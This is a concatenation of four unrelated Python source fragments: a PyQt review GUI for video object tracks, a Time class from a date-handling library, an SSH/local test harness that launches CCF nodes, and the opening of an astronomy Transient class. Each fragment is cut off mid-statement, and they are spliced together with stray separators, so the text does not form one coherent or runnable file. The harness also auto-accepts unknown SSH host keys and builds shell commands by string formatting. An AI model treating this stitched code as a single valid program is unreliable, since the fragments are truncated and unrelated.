'pixels',
self.frameScene.pathDia,
min=0,
max=500,
)
if accept:
self.sigTrackDia.emit(input_)
@qc.pyqtSlot()
def setTrackMarkerThickness(self):
input_, accept = qw.QInputDialog.getDouble(
self,
'Thickness of path markers',
'pixels',
self.frameScene.markerThickness,
min=0,
max=500,
)
if accept:
self.sigTrackMarkerThickness.emit(input_)
@qc.pyqtSlot(bool)
def enableDraw(self, enable: bool):
"""Activate arena drawing"""
self.frameScene.disableDrawing(not enable)
class TrackList(qw.QListWidget):
"""
Attributes
----------
keepSelection: bool
Whether to maintain selection of list item across frames. When the path
of the selected item is drawn, this makes things VERY SLOW.
selected: list of int
IDs of selected objects (in Review tool only a single selection is
allowed).
"""
# Map tracks: source-id, target-id, end-frame, swap
sigMapTracks = qc.pyqtSignal(int, int, int, bool)
sigSelected = qc.pyqtSignal(list)
def __init__(self, *args, **kwargs):
super(TrackList, self).__init__(*args, **kwargs)
self._drag_button = qc.Qt.NoButton
self.setSelectionMode(qw.QAbstractItemView.SingleSelection)
self.itemSelectionChanged.connect(self.sendSelected)
self.itemClicked.connect(self.sendSelected)
self.keepSelection = settings.value('review/keepselection', type=bool)
self.currentFrame = -1
self.selected = []
@qc.pyqtSlot(int)
def setCurrentFrame(self, val):
self.currentFrame = val
@qc.pyqtSlot(bool)
def setKeepSelection(self, val):
self.keepSelection = val
settings.setValue('review/keepselection', val)
def decode_item_data(
self, mime_data: qc.QMimeData
) -> List[Dict[qc.Qt.ItemDataRole, qc.QVariant]]:
"""This was a test trick found here:
https://wiki.python.org/moin/PyQt/Handling%20Qt%27s%20internal%20item%20MIME%20type
but a much simpler solution for my case was here:
https://stackoverflow.com/questions/9715171/how-to-drop-items-on-qlistwidget-between-some-items
"""
data = mime_data.data('application/x-qabstractitemmodeldatalist')
ds = qc.QDataStream(data)
item = {}
item_list = []
while not ds.atEnd():
ds.readInt32() # row
ds.readInt32() # col
map_items = ds.readInt32()
for ii in range(map_items):
key = ds.readInt32()
value = qc.QVariant()
ds >> value
item[qc.Qt.ItemDataRole(key)] = value
item_list.append(item)
return item_list
def dragMoveEvent(self, e: qg.QDragMoveEvent) -> None:
"""This is just for tracking left vs right mouse button drag"""
self._drag_button = e.mouseButtons()
super(TrackList, self).dragMoveEvent(e)
def dropEvent(self, event: qg.QDropEvent) -> None:
"""If dragged with left button, assign dropped trackid to the target
trackid, if right button, swap the two. If Shift key was
pressed, then apply these only for the current frame,
otherwise also all future frames.
"""
# items = self.decode_item_data(event.mimeData())
# assert len(items) == 1, 'Only allowed to drop a single item'
# item = items[0]
# logging.debug(f'data: {item[qc.Qt.DisplayRole].value()}')
# If dragged with left button, rename. if right button, swap
source = event.source().currentItem()
target = self.itemAt(event.pos())
if target is None:
event.ignore()
return
endFrame = -1
if qw.QApplication.keyboardModifiers() == qc.Qt.AltModifier:
endFrame, accept = qw.QInputDialog.getInt(
self,
'Frame range',
'Apply till frame',
self.currentFrame,
self.currentFrame,
2 ** 31 - 1,
)
if not accept:
endFrame = -1
elif qw.QApplication.keyboardModifiers() == qc.Qt.ShiftModifier:
endFrame = self.currentFrame
self.sigMapTracks.emit(
int(source.text()),
int(target.text()),
endFrame,
self._drag_button == qc.Qt.RightButton,
)
event.ignore()
@qc.pyqtSlot(list)
def replaceAll(self, track_list: List[int]):
"""Replace all items with keys from new tracks dictionary"""
self.blockSignals(True)
self.clear()
sorted_tracks = sorted(track_list)
self.addItems([str(x) for x in sorted_tracks])
# print(self, 'keep selection', self.keepSelection, 'selected:', self.selected)
if self.keepSelection and len(self.selected) > 0:
try:
idx = sorted_tracks.index(self.selected[0])
self.setCurrentRow(idx)
except ValueError:
pass
self.blockSignals(False)
# self.sigSelected.emit(self.selected)
return
self.blockSignals(False)
# print('Updating selection')
self.sendSelected()
@qc.pyqtSlot()
def sendSelected(self):
"""Intermediate slot to convert text labels into integer track ids"""
self.selected = [int(item.text()) for item in self.selectedItems()]
self.sigSelected.emit(self.selected)
# Note: even if this is sent multiple times (e.g., both
# itemSelectionChanged and itemClicked connected to this slot,
# the destination FrameView keeps track of current selection and
# ignores if the selection has not changed).
class LimitWin(qw.QMainWindow):
sigClose = qc.pyqtSignal(bool) # connected to action checked state
def __init__(self, *args, **kwargs):
super(LimitWin, self).__init__(*args, **kwargs)
def closeEvent(self, a0: qg.QCloseEvent) -> None:
self.sigClose.emit(False)
super(LimitWin, self).closeEvent(a0)
class ChangeWindow(qw.QMainWindow):
cols = ['frame', 'end', 'change', 'old id', 'new id']
def __init__(self):
super(ChangeWindow, self).__init__()
self.table = qw.QTableWidget()
self.table.setColumnCount(len(self.cols))
self.table.setHorizontalHeaderLabels(self.cols)
self.table.setSizeAdjustPolicy(qw.QAbstractScrollArea.AdjustToContents)
self.setWindowTitle('Argos: change list')
header = self.table.horizontalHeader()
for ii in range(len(self.cols)):
# header.setSectionResizeMode(0, qw.QHeaderView.Stretch)
header.setSectionResizeMode(ii, qw.QHeaderView.ResizeToContents)
self.setCentralWidget(self.table)
@qc.pyqtSlot(SortedKeyList)
def setChangeList(self, change_list):
self.table.clearContents()
self.table.setRowCount(len(change_list))
for ii, change in enumerate(change_list):
self.table.setItem(ii, 0, qw.QTableWidgetItem(str(change.frame)))
self.table.setItem(ii, 1, qw.QTableWidgetItem(str(change.end)))
self.table.setItem(
ii, 2, qw.QTableWidgetItem(change_name[change.change])
)
self.table.setItem(ii, 3, qw.QTableWidgetItem(str(change.orig)))
self.table.setItem(ii, 4, qw.QTableWidgetItem(str(change.new)))
self.table.resizeColumnsToContents()
class ReviewWidget(qw.QWidget):
"""A widget with two panes for reviewing track mislabelings"""
sigNextFrame = qc.pyqtSignal()
sigGotoFrame = qc.pyqtSignal(int)
sigLeftFrame = qc.pyqtSignal(np.ndarray, int)
sigRightFrame = qc.pyqtSignal(np.ndarray, int)
sigLeftTracks = qc.pyqtSignal(dict)
sigLeftTrackList = qc.pyqtSignal(
list
) # to separate tracks displayed on frame from those in list widget
sigRightTracks = qc.pyqtSignal(dict)
sigRightTrackList = qc.pyqtSignal(list)
sigAllTracksList = qc.pyqtSignal(list)
sigChangeTrack = qc.pyqtSignal(int, int, int)
sigSetColormap = qc.pyqtSignal(str, int)
sigDiffMessage = qc.pyqtSignal(str)
sigMousePosMessage = qc.pyqtSignal(str)
sigUndoCurrentChanges = qc.pyqtSignal(int)
sigDataFile = qc.pyqtSignal(str, bool)
sigProjectTrackHistLeft = qc.pyqtSignal(np.ndarray, str)
sigProjectTrackHistRight = qc.pyqtSignal(np.ndarray, str)
sigQuit = qc.pyqtSignal() # Pass on quit signal in a threadsafe way
def __init__(self, *args, **kwargs):
super(ReviewWidget, self).__init__(*args, **kwargs)
# Keep track of all the tracks seen so far
self.setObjectName('ReviewWidget')
self._wait_cond = threading.Event()
self.breakpoint = -1
self.entry_break = -1
self.exit_break = -1
self.jump_step = 10
self.history_length = 1
self.all_tracks = OrderedDict()
self.pathCmap = {
'left': settings.value('review/path_cmap_left', 'inferno'),
'right': settings.value('review/path_cmap_right', 'viridis'),
}
self.left_frame = None
self.right_frame = None
self.right_tracks = None
self.frame_no = -1
self.speed = 1.0
self.timer = qc.QTimer(self)
self.timer.setSingleShot(True)
self.video_reader = None
self.trackReader = None
self.track_filename = None
self.vid_info = VidInfo()
self.left_tracks = {}
self.right_tracks = {}
self.roi = None
# Since video seek is buggy, we have to do continuous reading
self.left_frame = None
self.right_frame = None
self.save_indicator = None
layout = qw.QVBoxLayout()
panes_layout = qw.QHBoxLayout()
self.leftView = TrackView()
self.leftView.setObjectName('LeftView')
self.leftView.frameScene.setObjectName('LeftScene')
# self.leftView.setSizePolicy(qw.QSizePolicy.MinimumExpanding, qw.QSizePolicy.MinimumExpanding)
self.leftView.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOn)
self.leftView.setVerticalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOn)
panes_layout.addWidget(self.leftView, 1)
max_list_width = 100
self.left_list = TrackList()
self.left_list.setObjectName('LeftList')
self.left_list.setMaximumWidth(max_list_width)
# | |
# -*- coding: utf-8 -*-
from datetime import time, datetime, timedelta
from .interval import Interval, AbsoluteInterval
from .mixins.default import TranslatableMixin, FormattableMixing, TestableMixin
from .constants import (
USECS_PER_SEC, SECS_PER_HOUR, SECS_PER_MIN
)
class Time(TranslatableMixin, FormattableMixing, TestableMixin, time):
"""
Represents a time instance as hour, minute, second, microsecond.
"""
def __init__(self, hour, minute=0, second=0, microsecond=0,
tzinfo=None, fold=0):
"""
Constructor.
:param hour: The hour.
:type hour: int
:param minute: The minute.
:type minute: int
:param second: The second
:type second: int
:param microsecond: The microsecond
:type microsecond: int
:param tzinfo: The timezone info (not used)
:type tzinfo: tzinfo or None
"""
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._time = time(hour, minute, second, microsecond, tzinfo)
self._fold = fold
@classmethod
def instance(cls, t, copy=True):
"""
Creates a Time instance from a time object.
It will raise a TypeError exception if the time
is timezone aware.
:param t: The time object
:type t: time
:param copy: Whether to return a copy of the instance or not.
:type copy: bool
:rtype: Time
:raises: TypeError
"""
if isinstance(t, Time) and not copy:
return t
return cls(t.hour, t.minute, t.second, t.microsecond, t.tzinfo)
@classmethod
def now(cls, with_microseconds=True):
"""
Return a Time instance corresponding to the current time.
It will return your local time.
By default, it will include microseconds.
Just set ``with_microseconds`` to ``False`` to exclude them.
:param with_microseconds: Whether to include microseconds or not.
:type with_microseconds: bool
:rtype: Time
"""
if cls.has_test_now():
if not with_microseconds:
return cls.get_test_now().replace(microsecond=0)
return cls.get_test_now()
now = datetime.now()
microsecond = now.microsecond if with_microseconds else 0
return cls(now.hour, now.minute, now.second, microsecond)
@property
def hour(self):
return self._hour
@property
def minute(self):
return self._minute
@property
def second(self):
return self._second
@property
def microsecond(self):
return self._microsecond
@property
def tzinfo(self):
return self._tzinfo
@property
def fold(self):
return self._fold
# Comparisons
def between(self, dt1, dt2, equal=True):
"""
Determines if the instance is between two others.
:type dt1: Time or time
:type dt2: Time or time
:param equal: Indicates if a > and < comparison shoud be used or <= and >=
:rtype: bool
"""
if dt1 > dt2:
dt1, dt2 = dt2, dt1
if equal:
return self >= dt1 and self <= dt2
return self > dt1 and self < dt2
def closest(self, dt1, dt2):
"""
Get the closest time from the instance.
:type dt1: Time or time
:type dt2: Time or time
:rtype: Time
"""
dt1 = self.instance(dt1, False)
dt2 = self.instance(dt2, False)
if self.diff(dt1).in_seconds() < self.diff(dt2).in_seconds():
return dt1
return dt2
def farthest(self, dt1, dt2):
"""
Get the farthest time from the instance.
:type dt1: Time or time
:type dt2: Time or time
:rtype: Time
"""
dt1 = self.instance(dt1, False)
dt2 = self.instance(dt2, False)
if self.diff(dt1).in_seconds() > self.diff(dt2).in_seconds():
return dt1
return dt2
def min_(self, dt=None):
"""
Get the minimum instance between a given instance (default now)
and the current instance.
:type dt: Time or time
:rtype: Time
"""
if dt is None:
dt = Time.now()
if self < dt:
return self
return self.instance(dt, False)
def minimum(self, dt=None):
"""
Get the minimum instance between a given instance (default now)
and the current instance.
:type dt: Time or time
:rtype: Time
"""
return self.min_(dt)
def max_(self, dt=None):
"""
Get the maximum instance between a given instance (default now)
and the current instance.
:type dt: Time or time
:rtype: Time
"""
if dt is None:
dt = Time.now()
if self > dt:
return self
return self.instance(dt, False)
def maximum(self, dt=None):
"""
Get the maximum instance between a given instance (default now)
and the current instance.
:type dt: Time or time
:rtype: Time
"""
return self.max_(dt)
def __hash__(self):
return self._time.__hash__()
# ADDITIONS AND SUBSTRACTIONS
def add(self, hours=0, minutes=0, seconds=0, microseconds=0):
"""
Add duration to the instance.
:param hours: The number of hours
:type hours: int
:param minutes: The number of minutes
:type minutes: int
:param seconds: The number of seconds
:type seconds: int
:param microseconds: The number of microseconds
:type microseconds: int
:rtype: Time
"""
from .pendulum import Pendulum
return Pendulum.EPOCH.at(
self._hour, self._minute, self._second, self._microsecond
).add(
hours=hours,
minutes=minutes,
seconds=seconds,
microseconds=microseconds
).time()
def subtract(self, hours=0, minutes=0, seconds=0, microseconds=0):
"""
Add duration to the instance.
:param hours: The number of hours
:type hours: int
:param minutes: The number of minutes
:type minutes: int
:param seconds: The number of seconds
:type seconds: int
:param microseconds: The number of microseconds
:type microseconds: int
:rtype: Time
"""
from .pendulum import Pendulum
return Pendulum.EPOCH.at(
self._hour, self._minute, self._second, self._microsecond
).subtract(
hours=hours,
minutes=minutes,
seconds=seconds,
microseconds=microseconds
).time()
def add_timedelta(self, delta):
"""
Add timedelta duration to the instance.
:param delta: The timedelta instance
:type delta: datetime.timedelta
:rtype: Time
"""
if delta.days:
raise TypeError('Cannot timedelta with days to Time.')
return self.add(
seconds=delta.seconds,
microseconds=delta.microseconds
)
def subtract_timedelta(self, delta):
"""
Remove timedelta duration from the instance.
:param delta: The timedelta instance
:type delta: datetime.timedelta
:rtype: Time
"""
if delta.days:
raise TypeError('Cannot timedelta with days to Time.')
return self.subtract(
seconds=delta.seconds,
microseconds=delta.microseconds
)
def __add__(self, other):
if not isinstance(other, timedelta):
return NotImplemented
return self.add_timedelta(other)
def __sub__(self, other):
if not isinstance(other, (Time, time, timedelta)):
return NotImplemented
if isinstance(other, timedelta):
return self.subtract_timedelta(other)
if isinstance(other, time):
if other.tzinfo is not None:
raise TypeError('Cannot subtract aware times to or from Time.')
other = self.instance(other)
return other.diff(self, False)
def __rsub__(self, other):
if not isinstance(other, (Time, time)):
return NotImplemented
if isinstance(other, time):
if other.tzinfo is not None:
raise TypeError('Cannot subtract aware times to or from Time.')
other = self.instance(other)
return other.__sub__(self)
# DIFFERENCES
def diff(self, dt=None, abs=True):
"""
Returns the difference between two Time objects as an Interval.
:type dt: Time or None
:param abs: Whether to return an absolute interval or not
:type abs: bool
:rtype: Interval
"""
if dt is None:
dt = self.now()
else:
dt = self.instance(dt, False)
us1 = (
self.hour * SECS_PER_HOUR
+ self.minute * SECS_PER_MIN
+ self.second
) * USECS_PER_SEC
us2 = (
dt.hour * SECS_PER_HOUR
+ dt.minute * SECS_PER_MIN
+ dt.second
) * USECS_PER_SEC
klass = Interval
if abs:
klass = AbsoluteInterval
return klass(microseconds=us2 - us1)
def diff_for_humans(self, other=None, absolute=False, locale=None):
"""
Get the difference in a human readable format in the current locale.
:type other: Time or time
:param absolute: removes time difference modifiers ago, after, etc
:type absolute: bool
:param locale: The locale to use for localization
:type locale: str
:rtype: str
"""
is_now = other is None
if is_now:
other = self.now()
diff = self.diff(other)
if diff.hours > 0:
unit = 'hour'
count = diff.hours
elif diff.minutes > 0:
unit = 'minute'
count = diff.minutes
else:
unit = 'second'
count = diff.seconds
if count == 0:
count = 1
time = self.translator().transchoice(unit, count, {'count': count}, locale=locale)
if absolute:
return time
is_future = diff.invert
if is_now:
trans_id = 'from_now' if is_future else 'ago'
else:
trans_id = 'after' if is_future else 'before'
# Some langs have special pluralization for past and future tense
try_key_exists = '%s_%s' % (unit, trans_id)
if try_key_exists != self.translator().transchoice(try_key_exists, count, locale=locale):
time = self.translator().transchoice(try_key_exists, count, {'count': count}, locale=locale)
return self.translator().trans(trans_id, {'time': time}, locale=locale)
# String formatting
def isoformat(self):
return self._time.isoformat()
# Testing aids
@classmethod
def set_test_now(cls, test_now=None):
"""
Set a Time instance (real or mock) to be returned when a "now"
instance is created. The provided instance will be returned
specifically under the following conditions:
- A call to the classmethod now() method, ex. Time.now()
To clear the test instance call this method using the default
parameter of None.
:type test_now: Date or Pendulum or None
"""
from .pendulum import Pendulum
if test_now is not None and not isinstance(test_now, (Pendulum, Time)):
raise TypeError(
'Time.set_test_now() only accepts a Time instance, '
'a Pendulum instance or None.'
)
cls._test_now = test_now
@classmethod
def get_test_now(cls):
if cls._test_now is None:
return None
if isinstance(cls._test_now, Time):
return cls._test_now
return cls._test_now.time()
# Compatibility methods
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
if tzinfo is True:
tzinfo = self._tzinfo
hour = hour if hour is not None else self._hour
minute = minute | |
<filename>tests/infra/remote.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import time
from enum import Enum
import paramiko
import logging
import subprocess
import getpass
from contextlib import contextmanager
import infra.path
import json
from loguru import logger as LOG
USER = getpass.getuser()
DBG = os.getenv("DBG", "cgdb")
def tmpdir_name(node_name):
elements = [USER]
job_name = os.getenv("JOB_NAME", None)
if job_name:
elements.append(job_name.replace("/", "_"))
elements.append(node_name)
return "_".join(elements)
@contextmanager
def sftp_session(hostname):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname)
try:
session = client.open_sftp()
try:
yield session
finally:
session.close()
finally:
client.close()
def log_errors(out_path, err_path):
try:
errors = 0
with open(out_path, "r") as lines:
for line in lines:
if line.startswith("[!]") or line.startswith("[!!]"):
LOG.error("{}: {}".format(out_path, line.rstrip()))
errors += 1
if errors:
try:
with open(err_path, "r") as lines:
LOG.error("{} contents:".format(err_path))
LOG.error(lines.read())
except IOError:
LOG.exception("Could not read err output {}".format(err_path))
except IOError:
LOG.exception("Could not check output {} for errors".format(out_path))
class CmdMixin(object):
def set_recovery(self):
self.cmd.append("--start=recover")
self.cmd = list(dict.fromkeys(self.cmd))
def set_perf(self):
self.cmd = [
"perf",
"record",
"--freq=1000",
"--call-graph=dwarf",
"-s",
] + self.cmd
class SSHRemote(CmdMixin):
def __init__(self, name, hostname, files, cmd):
"""
Runs a command on a remote host, through an SSH connection. A temporary
directory is created, and some files can be shipped over. The command is
run out of that directory.
Note that the name matters, since the temporary directory that will be first
deleted, then created and populated is /tmp/`tmpdir_name(name)`. There is deliberately no
cleanup on shutdown, to make debugging/inspection possible.
setup() connects, creates the directory and ships over the files
start() runs the specified command
stop() disconnects, which shuts down the command via SIGHUP
restart() reconnects and reruns the specified command
"""
self.hostname = hostname
self.files = files
self.cmd = cmd
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.root = os.path.join("/tmp", tmpdir_name(name))
def _rc(self, cmd):
LOG.info("[{}] {}".format(self.hostname, cmd))
_, stdout, _ = self.client.exec_command(cmd)
return stdout.channel.recv_exit_status()
def _connect(self):
LOG.debug("[{}] connect".format(self.hostname))
self.client.connect(self.hostname)
def _setup_files(self):
assert self._rc("rm -rf {}".format(self.root)) == 0
assert self._rc("mkdir {}".format(self.root)) == 0
session = self.client.open_sftp()
for path in self.files:
tgt_path = os.path.join(self.root, os.path.basename(path))
LOG.info("[{}] copy {} from {}".format(self.hostname, tgt_path, path))
session.put(path, tgt_path)
session.close()
executable = self.cmd[0]
if executable.startswith("./"):
executable = executable[2:]
assert self._rc("chmod +x {}".format(os.path.join(self.root, executable))) == 0
def get(self, filename, timeout=60):
"""
Get file called `filename` under the root of the remote. If the
file is missing, wait for timeout, and raise an exception.
If the file is present, it is copied to the CWD on the caller's host.
This call spins up a separate client because we don't want to interrupt
the main cmd that may be running.
"""
with sftp_session(self.hostname) as session:
for seconds in range(timeout):
try:
session.get(os.path.join(self.root, filename), filename)
LOG.debug(
"[{}] found {} after {}s".format(
self.hostname, filename, seconds
)
)
break
except Exception:
time.sleep(1)
else:
raise ValueError(filename)
def list_files(self, timeout=60):
files = []
with sftp_session(self.hostname) as session:
for seconds in range(timeout):
try:
files = session.listdir(self.root)
break
except Exception:
time.sleep(1)
else:
raise ValueError(self.root)
return files
def get_logs(self):
with sftp_session(self.hostname) as session:
for filename in ("err", "out"):
try:
filepath = os.path.join(self.root, filename)
local_filepath = "{}_{}".format(self.hostname, filename)
session.get(filepath, local_filepath)
LOG.info("Downloaded {}".format(local_filepath))
except Exception:
LOG.warning(
"Failed to download {} from {}".format(filepath, self.hostname)
)
def start(self):
"""
Start cmd on the remote host. stdout and err are captured to file locally.
We create a pty on thre remote host under which to run the command, so as to
get a SIGHUP on disconnection.
"""
cmd = self._cmd()
LOG.info("[{}] {}".format(self.hostname, cmd))
self.client.exec_command(cmd, get_pty=True)
def stop(self):
"""
Disconnect the client, and therefore shut down the command as well.
"""
LOG.info("[{}] closing".format(self.hostname))
self.get_logs()
log_errors("{}_out".format(self.hostname), "{}_err".format(self.hostname))
self.client.close()
def restart(self):
self._connect()
self.start()
def setup(self):
"""
Connect to the remote host, empty the temporary directory if it exsits,
and populate it with the initial set of files.
"""
self._connect()
self._setup_files()
def _cmd(self):
return "cd {} && stdbuf -o0 ./{} 1>out 2>err 0</dev/null".format(
self.root, " ".join(self.cmd)
)
def _dbg(self):
return "cd {} && {} --args ./{}".format(self.root, DBG, " ".join(self.cmd))
def wait_for_stdout_line(self, line, timeout):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(self.hostname)
try:
for _ in range(timeout):
_, stdout, _ = self.client.exec_command(
"grep -F '{}' {}/out".format(line, self.root)
)
if stdout.channel.recv_exit_status() == 0:
return
time.sleep(1)
raise ValueError(
"{} not found in stdout after {} seconds".format(line, timeout)
)
finally:
client.close()
@contextmanager
def ssh_remote(name, hostname, files, cmd):
"""
Context Manager wrapper for SSHRemote
"""
remote = SSHRemote(name, hostname, files, cmd)
try:
remote.setup()
remote.start()
yield remote
finally:
remote.stop()
class LocalRemote(CmdMixin):
def __init__(self, name, hostname, files, cmd):
"""
Local Equivalent to the SSHRemote
"""
self.hostname = hostname
self.files = files
self.cmd = cmd
self.root = os.path.join("/tmp", tmpdir_name(name))
self.proc = None
self.stdout = None
self.stderr = None
def _rc(self, cmd):
LOG.info("[{}] {}".format(self.hostname, cmd))
return subprocess.call(cmd, shell=True)
def _setup_files(self):
assert self._rc("rm -rf {}".format(self.root)) == 0
assert self._rc("mkdir {}".format(self.root)) == 0
for path in self.files:
tgt_path = os.path.join(self.root, os.path.basename(path))
assert self._rc("cp {} {}".format(path, tgt_path)) == 0
executable = self.cmd[0]
if executable.startswith("./"):
executable = executable[2:]
else:
self.cmd[0] = "./{}".format(self.cmd[0])
assert self._rc("chmod +x {}".format(os.path.join(self.root, executable))) == 0
def get(self, filename, timeout=60):
path = os.path.join(self.root, filename)
for _ in range(timeout):
if os.path.exists(path):
break
time.sleep(1)
else:
raise ValueError(path)
assert self._rc("cp {} {}".format(path, filename)) == 0
def list_files(self):
return os.listdir(self.root)
def start(self):
"""
Start cmd. stdout and err are captured to file locally.
"""
cmd = self._cmd()
LOG.info("[{}] {}".format(self.hostname, cmd))
self.stdout = open(os.path.join(self.root, "out"), "wb")
self.stderr = open(os.path.join(self.root, "err"), "wb")
self.proc = subprocess.Popen(
self.cmd, cwd=self.root, stdout=self.stdout, stderr=self.stderr
)
def stop(self):
"""
Disconnect the client, and therefore shut down the command as well.
"""
LOG.info("[{}] closing".format(self.hostname))
if self.proc:
self.proc.terminate()
self.proc.wait()
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
log_errors(os.path.join(self.root, "out"), os.path.join(self.root, "err"))
def restart(self):
self.start()
def setup(self):
"""
Empty the temporary directory if it exists,
and populate it with the initial set of files.
"""
self._setup_files()
def _cmd(self):
return "cd {} && {} 1>out 2>err".format(self.root, " ".join(self.cmd))
def _dbg(self):
return "cd {} && {} --args {}".format(self.root, DBG, " ".join(self.cmd))
def wait_for_stdout_line(self, line, timeout):
for _ in range(timeout):
with open(os.path.join(self.root, "out"), "rb") as out:
for out_line in out:
if out_line.strip().decode() == line.strip():
return
time.sleep(1)
raise ValueError(
"{} not found in stdout after {} seconds".format(line, timeout)
)
class CCFRemote(object):
BIN = "cchost"
DEPS = []
def __init__(
self,
lib_path,
node_id,
host,
pubhost,
raft_port,
tls_port,
remote_class,
enclave_type,
log_level,
expect_quote,
sig_max_tx,
sig_max_ms,
node_status,
election_timeout,
memory_reserve_startup,
notify_server,
ledger_file=None,
sealed_secrets=None,
):
"""
Run a ccf binary on a remote host.
"""
self.node_id = node_id
self.host = host
self.pubhost = pubhost
self.raft_port = raft_port
self.tls_port = tls_port
self.pem = "{}.pem".format(node_id)
self.quote = expect_quote
self.node_status = node_status
if expect_quote:
self.quote = "quote{}.bin".format(node_id)
self.BIN = infra.path.build_bin_path(self.BIN, enclave_type)
self.ledger_file = ledger_file
self.ledger_file_name = (
os.path.basename(ledger_file)
if ledger_file
else "{}.ledger".format(node_id)
)
cmd = [
self.BIN,
"--enclave-file={}".format(lib_path),
"--raft-election-timeout-ms={}".format(election_timeout),
"--raft-host={}".format(host),
"--raft-port={}".format(raft_port),
"--tls-host={}".format(host),
"--tls-pubhost={}".format(pubhost),
"--tls-port={}".format(tls_port),
"--ledger-file={}".format(self.ledger_file_name),
"--node-cert-file={}".format(self.pem),
"--enclave-type={}".format(enclave_type),
"--log-level={}".format(log_level),
]
if sig_max_tx is not None:
cmd += ["--sig-max-tx={}".format(sig_max_tx)]
if sig_max_ms is not None:
cmd += ["--sig-max-ms={}".format(sig_max_ms)]
if memory_reserve_startup is not None:
cmd += ["--memory-reserve-startup={}".format(memory_reserve_startup)]
if notify_server is not None:
notify_server_host, *notify_server_port = notify_server.split(":")
if not notify_server_host or not (
notify_server_port and notify_server_port[0]
):
raise ValueError(
"Notification server host:port configuration is invalid"
)
cmd += ["--notify-server-host={}".format(notify_server_host)]
cmd += ["--notify-server-port={}".format(notify_server_port[0])]
if expect_quote:
cmd.append("--quote-file={}".format(self.quote))
self.remote = remote_class(
node_id,
host,
[self.BIN, lib_path]
+ self.DEPS
+ ([self.ledger_file] if self.ledger_file else [])
+ ([sealed_secrets] if sealed_secrets else []),
cmd,
)
def setup(self):
self.remote.setup()
def start(self):
self.remote.start()
return self.info()
def restart(self):
self.remote.restart()
return self.info()
def info(self):
self.remote.get(self.pem)
quote_bytes = []
if self.quote:
self.remote.get(self.quote)
quote_bytes = infra.path.quote_bytes(self.quote)
return {
"host": self.host,
"raftport": str(self.raft_port),
"pubhost": self.pubhost,
"tlsport": str(self.tls_port),
"cert": infra.path.cert_bytes(self.pem),
"quote": quote_bytes,
"status": NodeStatus[self.node_status].value,
}
def node_cmd(self):
return self.remote._cmd()
def debug_node_cmd(self):
return self.remote._dbg()
def stop(self):
try:
self.remote.stop()
except Exception:
LOG.exception("Failed to shut down {} cleanly".format(self.node_id))
def wait_for_stdout_line(self, line, timeout=5):
return self.remote.wait_for_stdout_line(line, timeout)
def set_recovery(self):
self.remote.set_recovery()
def set_perf(self):
self.remote.set_perf()
def get_sealed_secrets(self):
files = self.remote.list_files()
sealed_secrets_files = []
for f in files:
if f.startswith("sealed_secrets."):
sealed_secrets_files.append(f)
latest_sealed_secrets = sorted(sealed_secrets_files, reverse=True)[0]
self.remote.get(latest_sealed_secrets)
return latest_sealed_secrets
def get_ledger(self):
self.remote.get(self.ledger_file_name)
return self.ledger_file_name
@contextmanager
def ccf_remote(
lib_path, node_id, host, pubhost, raft_port, tls_port, args, remote_class
):
"""
Context Manager wrapper for CCFRemote
"""
remote = CCFRemote(
lib_path, node_id, host, pubhost, raft_port, tls_port, args, remote_class
)
try:
remote.setup()
remote.start()
yield remote
finally:
remote.stop()
class NodeStatus(Enum):
pending = 0
| |
<filename>redback/transient/transient.py
from __future__ import annotations
from typing import Union
import matplotlib
import numpy as np
import pandas as pd
import redback
from redback.plotting import \
LuminosityPlotter, FluxDensityPlotter, IntegratedFluxPlotter, MagnitudePlotter
class Transient(object):
DATA_MODES = ['luminosity', 'flux', 'flux_density', 'magnitude', 'counts', 'ttes']
_ATTRIBUTE_NAME_DICT = dict(luminosity="Lum50", flux="flux", flux_density="flux_density",
counts="counts", magnitude="magnitude")
ylabel_dict = dict(luminosity=r'Luminosity [$10^{50}$ erg s$^{-1}$]',
magnitude=r'Magnitude',
flux=r'Flux [erg cm$^{-2}$ s$^{-1}$]',
flux_density=r'Flux density [mJy]',
counts=r'Counts')
luminosity_data = redback.utils.DataModeSwitch('luminosity')
flux_data = redback.utils.DataModeSwitch('flux')
flux_density_data = redback.utils.DataModeSwitch('flux_density')
magnitude_data = redback.utils.DataModeSwitch('magnitude')
counts_data = redback.utils.DataModeSwitch('counts')
tte_data = redback.utils.DataModeSwitch('ttes')
def __init__(
self, time: np.ndarray = None, time_err: np.ndarray = None, time_mjd: np.ndarray = None,
time_mjd_err: np.ndarray = None, time_rest_frame: np.ndarray = None, time_rest_frame_err: np.ndarray = None,
Lum50: np.ndarray = None, Lum50_err: np.ndarray = None, flux: np.ndarray = None,
flux_err: np.ndarray = None, flux_density: np.ndarray = None, flux_density_err: np.ndarray = None,
magnitude: np.ndarray = None, magnitude_err: np.ndarray = None, counts: np.ndarray = None,
ttes: np.ndarray = None, bin_size: float = None, redshift: float = np.nan, data_mode: str = None,
name: str = '', photon_index: float = np.nan, use_phase_model: bool = False,
frequency: np.ndarray = None, system: np.ndarray = None, bands: np.ndarray = None,
active_bands: Union[np.ndarray, str] = None, **kwargs: None) -> None:
"""This is a general constructor for the Transient class. Note that you only need to give data corresponding to
the data mode you are using. For luminosity data provide times in the rest frame, if using a phase model
provide time in MJD, else use the default time (observer frame).
:param time: Times in the observer frame.
:type time: np.ndarray, optional
:param time_err: Time errors in the observer frame.
:type time_err: np.ndarray, optional
:param time_mjd: Times in MJD. Used if using phase model.
:type time_mjd: np.ndarray, optional
:param time_mjd_err: Time errors in MJD. Used if using phase model.
:type time_mjd_err: np.ndarray, optional
:param time_rest_frame: Times in the rest frame. Used for luminosity data.
:type time_rest_frame: np.ndarray, optional
:param time_rest_frame_err: Time errors in the rest frame. Used for luminosity data.
:type time_rest_frame_err: np.ndarray, optional
:param Lum50: Luminosity values.
:type Lum50: np.ndarray, optional
:param Lum50_err: Luminosity error values.
:type Lum50_err: np.ndarray, optional
:param flux: Flux values.
:type flux: np.ndarray, optional
